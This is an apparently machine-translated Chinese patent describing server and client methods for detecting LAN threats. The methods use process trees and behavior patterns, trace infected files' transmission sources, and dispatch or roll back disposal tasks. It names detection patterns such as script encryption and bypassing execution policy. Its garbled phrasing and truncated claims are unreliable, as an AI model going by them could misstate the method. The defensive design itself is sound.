To sum up, the threat processing method based on LAN of the embodiment of the present invention, because file transmission events can be used for table Show the circulation event of subscriber terminal side file, each file transmission events of subscriber terminal side are reported to server, therefore this Inventive embodiments can be based on the analysis of the information of pair to be analyzed file transmission events related to abnormal document, obtain abnormal literary The corresponding transmission source of part；Accordingly, with respect to traditional virus characteristic storehouse, the embodiment of the present invention can be reported by user terminal File transmission events, unknown threat and the potential safety hazard of LAN are detected more in time such that it is able to improve safety detection Promptness；Further, as early as possible intercept process can be carried out to the corresponding transmission source of the abnormal document, to realize for different The often closure of the propagation path of file.

With reference to Fig. 6, a kind of step of threat processing method based on LAN according to an embodiment of the invention is shown Rapid flow chart, specifically may include steps of：

Step 601, user terminal capture local system snapshot after the completion of os starting, and on server Report said system snapshot；

Step 602, user terminal monitor the process behavior of local process, and report the process row that monitoring obtains to server For；

In actual applications, when the process behavior of local process changes, reporting for process behavior can be triggered, can To understand, the embodiment of the present invention is not limited for the concrete trigger condition that process behavior that monitoring obtains is reported to server System.

Step 603, server set up the user terminal on the basis of the system snapshot according to above-mentioned process behavior In process tree not in the same time；

Step 604, server set up it with process start and stop behavior and/or memory line for each process in the process tree For and/or change behavior between mapping relations；

Step 605, server obtain the target process for meeting preset process behavior pattern from the process tree；

Step 606, server judge whether the target process is to threaten right according to the process behavior of the target process As.

In a kind of alternative embodiment of the present invention, the method for the present embodiment can also include：

Step 607, user terminal are monitored to local file transmission events, and the text for monitoring is reported to server The information of part transmission events and this document transmission events；

The file transmission events that step 608, server are reported to user terminal are recorded；

If step 609, the target process are threat object, server obtains the exception involved by the target process File, and obtain file transmission events to be analyzed corresponding with the abnormal document from the advance file transmission events for obtaining；

Step 610, server are analyzed to the information of the file transmission events to be analyzed, literary to obtain the exception The corresponding transmission source of part and/or affected user terminal.

To sum up, the threat processing method based on LAN of the embodiment of the present invention, due to based on user terminal in difference The analysis of the mapping relations in the process tree at quarter and the process tree between each process and process behavior, acquisition meets preset The target process of process behavior pattern, and according to the process behavior of the target process, judge whether the target process is prestige Side of body object；Accordingly, with respect to traditional virus characteristic storehouse, the embodiment of the present invention can pass through process tree not in the same time, described The suspicious actions pattern or malice of mapping relations and sign process behavior in process tree between each process and process behavior The preset behavior pattern of behavior pattern, detects more in time unknown threat and the potential safety hazard of LAN such that it is able to improve The promptness of safety detection, and effective prevention of virus can be realized.

Also, because file transmission events can be used to represent the circulation event of subscriber terminal side file, subscriber terminal side Each file transmission events is reported to server, therefore the embodiment of the present invention can be based on pair related to abnormal document treat point The analysis of the information of analysis file transmission events, obtains the corresponding transmission source of abnormal document；It is special accordingly, with respect to traditional virus Storehouse is levied, the file transmission events that the embodiment of the present invention can be reported by user terminal detect more in time LAN not Know threat and potential safety hazard such that it is able to improve the promptness of safety detection；Further, can as early as possible to the abnormal document pair The transmission source answered carries out intercept process, to realize the closure of the propagation path for abnormal document.

For embodiment of the method, in order to be briefly described, therefore it is all expressed as a series of combination of actions, but this area Technical staff should know that the embodiment of the present invention is not limited by described sequence of movement, because according to present invention enforcement Example, some steps can adopt other orders or while carry out.Secondly, those skilled in the art also should know, specification Described in embodiment belong to alternative embodiment, necessary to the involved action not necessarily embodiment of the present invention.

With reference to Fig. 7, a kind of knot of threat processing meanss based on LAN according to an embodiment of the invention is shown Structure block diagram, is applied to server, specifically can include such as lower module：

First task issues module 701, for issuing threat disposal task to the user terminal in the LAN, so that The user terminal is disposed operation to the corresponding threat object of the threat disposal task；And

Second task issues module 702, for the target disposal operations for meeting preset rollback condition, to corresponding use Family terminal issues process rollback task, so that the user terminal enters to the corresponding target disposal operations of the process rollback task Row rollback.

Alternatively, described device can also include：

Process behavior receiver module, for receiving the process behavior that the user terminal in the LAN is reported；

Set up module, for according to the process behavior, setting up the user terminal in process tree not in the same time and Mapping relations in the process tree between each process and process behavior；

Target process acquisition module, enters for obtaining the target for meeting preset process behavior pattern from the process tree Journey；And

Safety detection module, for according to the process behavior of the target process, judging whether the target process is prestige Side of body object.

Above-mentioned process behavior receiver module, set up module, set up module and safety detection module cooperates, for detecting Threat object in LAN.Certainly, those skilled in the art can be according to practical application request, using other modes detection office Threat object in the net of domain, such as detects there is the IP for threatening by five-tuple, and the embodiment of the present invention is in detection LAN The concrete mode of threat object be not any limitation as.

Alternatively, described device can also include：

Snapshot receiver module, for receiving the system snapshot at certain moment that the user terminal is reported；

Then the module of setting up can include：

Setting up submodule, on the basis of the system snapshot, according to above-mentioned process behavior user's end being set up End is in process tree not in the same time.

Alternatively, the system snapshot can be the user terminal the first moment system mode, the process row To include：Process start and stop behavior, then the setting up submodule can include：

Process tree sets up unit, for according to the process start and stop behavior after first moment, obtaining user's end Hold the process tree at the second moment.

Alternatively, the process behavior can include：Process start and stop behavior and/or internal memory behavior and/or change behavior, then The module of setting up can include：

Mapping setting up submodule, it is with process start and stop behavior and/or interior for for each process in the process tree, setting up it Deposit the mapping relations between behavior and/or change behavior.

Alternatively, the preset process behavior pattern can include：

File associated process starts non-OS process；And/or

In process change file system after the first file, access the second file and encrypt.

Alternatively, the safety detection module can include：

First judging submodule, for sending corresponding warning information for the target process, so that administrator For the warning information, according to the process behavior of the target process, judge whether the target process is threat object； And/or

Second judging submodule, for using descendants's process of the target process or the target process as treating point Analysis process, according to the execution parameter of the process behavior of the process to be analyzed, judges whether the target process is threat object.

Alternatively, second judging submodule can include：

First performs parameter detecting unit, and the order line script environment parameter for including in the execution parameter is related to pin During this encryption behavior, the safety detection result of the target process is dangerous；And/or

Second performs parameter detecting unit, and the strategy for including in the execution parameter excludes parameter and is related to bypass execution During the behavior of restriction strategy, the safety detection result of the target process is dangerous.

Alternatively, described device can also include：

Transmission events acquisition module, for when the safety detection result of the target process is dangerous, obtaining institute The abnormal document involved by target process is stated, and obtains corresponding to the abnormal document from the advance file transmission events for obtaining File transmission events to be analyzed；Wherein, the file transmission events are the event that the user terminal in the LAN is reported；

Transmission events analysis module, for being analyzed to the information of the file transmission events to be analyzed, to obtain State the corresponding transmission source of abnormal document and/or affected user terminal.

Alternatively, the transmission events analysis module can include：

First transmission events molecular modules, for according to the temporal information of the file transmission events to be analyzed, from described The earliest file destination transmission events of time of origin are obtained in file transmission events to be analyzed, and is transmitted according to the file destination The channel information of event, obtains the corresponding transmission source of the abnormal document；And/or

Second transmission events molecular modules, for according to the end message of the file transmission events to be analyzed, obtaining institute State the corresponding affected user terminal of abnormal document.

Alternatively, the information of the file transmission events can include at least one in following information：Temporal information, canal Road information, fileinfo, paper conveyance direction and end message.

For device embodiment, due to itself and embodiment of the method basic simlarity, so description is fairly simple, it is related Part is illustrated referring to the part of embodiment of the method.

With reference to Fig. 8, a kind of knot of threat processing meanss based on LAN according to an embodiment of the invention is shown Structure block diagram, is applied to user terminal, specifically can include such as lower module：

First receiver module 801, for the threat that the reception server is issued task is disposed；

Disposal operations module 802, for being disposed operation to the corresponding threat object of the threat disposal task；

Second receiver module 803, issues for the reception server for the target disposal operations for meeting preset rollback condition Process rollback task；And

Roll-back module 804 is disposed, for carrying out rollback to the corresponding target disposal operations of the process rollback task.

Alternatively, described device can also include：

Reminding module, for entering to the corresponding target disposal operations of the process rollback task in the process roll-back module Before row rollback, the rollback information of the corresponding target disposal operations of the process rollback task is issued the user with；

It is then described to dispose roll-back module 804, specifically for foundation user for the confirmation of the rollback information is operated, Rollback is carried out to the corresponding target disposal operations of the process rollback task.

Provided herein algorithm and display be not inherently related to any certain computer, virtual system or miscellaneous equipment. Various general-purpose systems can also be used together based on teaching in this.As described above, construct required by this kind of system Structure be obvious.Additionally, the present invention is also not for any certain programmed language.It is understood that, it is possible to use it is various Programming language realizes the content of invention described herein, and the description done to language-specific above is to disclose this Bright preferred forms.

In specification mentioned herein, a large amount of details are illustrated.It is to be appreciated, however, that the enforcement of the present invention Example can be put into practice in the case of without these details.In some instances, known method, structure is not been shown in detail And technology, so as not to obscure the understanding of this description.

Similarly, it will be appreciated that in order to simplify the disclosure and help understand one or more in each inventive aspect, exist Above in the description of the exemplary embodiment of the present invention, each feature of the present invention is grouped together into single enforcement sometimes In example, figure or descriptions thereof.However, the method for the disclosure should be construed to reflect following intention：I.e. required guarantor The more features of feature that the application claims ratio of shield is expressly recited in each claim.More precisely, such as following Claims reflect as, inventive aspect is all features less than single embodiment disclosed above.Therefore, Thus the claims for following specific embodiment are expressly incorporated in the specific embodiment, wherein each claim itself All as the separate embodiments of the present invention.

Those skilled in the art are appreciated that can be carried out adaptively to the module in the equipment in embodiment Change and they are arranged in one or more equipment different from the embodiment.Can be the module or list in embodiment Unit or component are combined into a module or unit or component, and can be divided in addition multiple submodule or subelement or Sub-component.In addition at least some in such feature and/or process or unit is excluded each other, can adopt any Combine to all features disclosed in this specification (including adjoint claim, summary and accompanying drawing) and so disclosed Where all processes or unit of method or equipment are combined.Unless expressly stated otherwise, this specification is (including adjoint power Profit is required, summary and accompanying drawing) disclosed in each feature can it is identical by offers, be equal to or the alternative features of similar purpose carry out generation Replace.

Although additionally, it will be appreciated by those of skill in the art that some embodiments described herein include other embodiments In included some features rather than further feature, but the combination of the feature of different embodiments means in of the invention Within the scope of and form different embodiments.For example, in the following claims, embodiment required for protection appoint One of meaning can in any combination mode using.

The present invention all parts embodiment can be realized with hardware, or with one or more processor operation Software module realize, or with combinations thereof realization.It will be understood by those of skill in the art that can use in practice Microprocessor or digital signal processor (DSP, Digital Signal Process) are according to embodiments of the present invention to realize The threat treating method and apparatus based on LAN in some or all parts some or all functions.The present invention It is also implemented as some or all equipment or program of device for performing method as described herein (for example, Computer program and computer program).Such program for realizing the present invention can be stored on a computer-readable medium, Or can the form with one or more signal.Such signal can be downloaded from Internet platform and obtained, or There is provided on carrier signal, or provide in any other form.

It should be noted that above-described embodiment the present invention will be described rather than limits the invention, and ability Field technique personnel can design without departing from the scope of the appended claims alternative embodiment.In the claims, Any reference symbol between bracket should not be configured to limitations on claims.Word " including " is not excluded the presence of not Element listed in the claims or step.Word "a" or "an" before element does not exclude the presence of multiple such Element.The present invention can come real by means of the hardware for including some different elements and by means of properly programmed computer It is existing.If in the unit claim for listing equipment for drying, several in these devices can be by same hardware branch To embody.The use of word first, second, and third does not indicate that any order.These words can be explained and be run after fame Claim.

The invention discloses A1, a kind of threat processing method based on LAN, are applied to server, including：

A2, the method as described in A1, detect as follows the threat object：

Receive the process behavior that the user terminal in the LAN is reported；

According to the process behavior, the user terminal is set up in process tree not in the same time and the process tree Mapping relations between each process and process behavior；

The target process for meeting preset process behavior pattern is obtained from the process tree；

According to the process behavior of the target process, judge whether the target process is threat object.

A3, the method as described in A2, methods described also includes：

Receive the system snapshot at certain moment that the user terminal is reported；

It is then described according to the process behavior, set up the user terminal the step of not process tree in the same time, including：

On the basis of the system snapshot, the user terminal is set up in not entering in the same time according to above-mentioned process behavior Cheng Shu.

A4, the method as described in A2, the process behavior includes：Process start and stop behavior and/or internal memory behavior and/or change Behavior, then it is described according to the process behavior, set up mapping relations in the process tree between each process and process behavior Step, including：

For each process in the process tree, it is set up with process start and stop behavior and/or internal memory behavior and/or change behavior Between mapping relations.

A5, the method as described in arbitrary in A2 to A4, the preset process behavior pattern includes：

File associated process starts non-OS process；And/or

A6, the method as described in arbitrary in A2 to A4, the process behavior according to the target process, judge the mesh The step of whether mark process is threat object, including：

Corresponding warning information is sent for the target process, so that administrator is directed to the warning information, according to According to the process behavior of the target process, judge whether the target process is threat object；And/or

Using descendants's process of the target process or the target process as process to be analyzed, treat point according to described The execution parameter of the process behavior of analysis process, judges whether the target process is threat object.

A7, the method as described in A6, the execution parameter of the process behavior according to the process to be analyzed judges described The step of whether target process is threat object, including：

A8, the method as described in arbitrary in A2 to A4, methods described also includes：

If the target process is threat object, the abnormal document involved by the target process is obtained, and from advance File transmission events to be analyzed corresponding with the abnormal document are obtained in the file transmission events of acquisition；Wherein, the file Transmission events are the event that the user terminal in the LAN is reported；

The information of the file transmission events to be analyzed is analyzed, is come with obtaining the corresponding transmission of the abnormal document Source and/or affected user terminal.

A9, the method as described in A8, the step of the information to the file transmission events to be analyzed is analyzed, bag Include：

According to the temporal information of the file transmission events to be analyzed, obtain from the file transmission events to be analyzed and send out Earliest file destination transmission events of raw time, and according to the channel information of the file destination transmission events, obtain described different The often corresponding transmission of file is originated；And/or

According to the end message of the file transmission events to be analyzed, the corresponding affected user of the abnormal document is obtained Terminal.

A10, the method as described in A8, the information of the file transmission events includes at least one in following information：When Between information, channel information, fileinfo, paper conveyance direction and end message.

The invention discloses B11, a kind of threat processing method based on LAN, are applied to user terminal, including：

Task is disposed in the threat that the reception server is issued；

The corresponding target disposal operations of the process rollback task are carried out back by B12, the method as described in B11 described Before the step of rolling, methods described also includes：

Issue the user with the rollback information of the corresponding target disposal operations of the process rollback task；

According to user for the confirmation of the rollback information is operated, at the corresponding target of the process rollback task Putting operation carries out rollback.

The invention discloses C13, a kind of threat processing meanss based on LAN, are applied to server, including：

C14, the device as described in C13, described device also includes：

C15, the device as described in C14, described device also includes：

Then the module of setting up includes：

C16, the device as described in C14, the process behavior includes：Process start and stop behavior and/or internal memory behavior and/or change More behavior, then the module of setting up include：

C17, the device as described in arbitrary in C14 to C16, the preset process behavior pattern includes：

File associated process starts non-OS process；And/or

C18, the device as described in arbitrary in C14 to C16, the safety detection module includes：

C19, the device as described in C18, second judging submodule includes：

C20, the device as described in arbitrary in C14 to C16, described device also includes：

C21, the device as described in C20, the transmission events analysis module includes：

C22, the device as described in C20, the information of the file transmission events includes at least one in following information：When Between information, channel information, fileinfo, paper conveyance direction and end message.

The invention discloses D23, a kind of threat processing meanss based on LAN, are applied to user terminal, including：

D24, the device as described in D23, described device also includes：

Then the disposal roll-back module, right specifically for foundation user for the confirmation of the rollback information is operated The corresponding target disposal operations of rollback task that process carry out rollback.

Claims

1. a kind of threat processing method based on LAN, is applied to server, including：

Threat disposal task is issued to the user terminal in the LAN, so that the user terminal threatens disposal to appoint to described Corresponding threat object of being engaged in is disposed operation；

2. the method for claim 1, it is characterised in that detect the threat object as follows：

Receive the process behavior that the user terminal in the LAN is reported；

According to the process behavior, set up the user terminal and respectively enter in process tree not in the same time and the process tree Mapping relations between journey and process behavior；

3. method as claimed in claim 2, it is characterised in that methods described also includes：

On the basis of the system snapshot, the user terminal is set up in process not in the same time according to above-mentioned process behavior Tree.

4. method as claimed in claim 2, it is characterised in that the process behavior includes：Process start and stop behavior and/or internal memory Behavior and/or change behavior, then it is described according to the process behavior, set up in the process tree between each process and process behavior Mapping relations the step of, including：

For each process in the process tree, it is set up between process start and stop behavior and/or internal memory behavior and/or change behavior Mapping relations.

5. the method as described in arbitrary in claim 2 to 4, it is characterised in that the preset process behavior pattern includes：

File associated process starts non-OS process；And/or

6. the method as described in arbitrary in claim 2 to 4, it is characterised in that the process row according to the target process For, the step of whether judge the target process be threat object, including：

Corresponding warning information is sent for the target process, so that administrator is directed to the warning information, according to institute The process behavior of target process is stated, judges whether the target process is threat object；And/or

Using descendants's process of the target process or the target process as process to be analyzed, according to it is described it is to be analyzed enter The execution parameter of the process behavior of journey, judges whether the target process is threat object.

7. method as claimed in claim 6, it is characterised in that the execution of the process behavior according to the process to be analyzed Parameter, the step of whether judge the target process be threat object, including：

If the order line script environment parameter that the execution parameter is included is related to script encryption behavior, the peace of the target process Full property testing result is dangerous；And/or

If the strategy that the execution parameter is included excludes parameter to be related to bypass the behavior for performing restriction strategy, the target process Safety detection result for dangerous.

8. a kind of threat processing method based on LAN, is applied to user terminal, including：

Task is disposed in the threat that the reception server is issued；

9. a kind of threat processing meanss based on LAN, are applied to server, including：

First task issues module, for issuing threat disposal task to the user terminal in the LAN, so that the use The corresponding threat object of disposal task is threatened to be disposed operation described in the terminal-pair of family；And

Second task issues module, for the target disposal operations for meeting preset rollback condition, to corresponding user terminal Process rollback task is issued, so that the user terminal is carried out back to the corresponding target disposal operations of the process rollback task Rolling.

10. a kind of threat processing meanss based on LAN, are applied to user terminal, including：

Second receiver module, is directed to for the reception server and meets the process time that the target disposal operations of preset rollback condition are issued Rolling task；And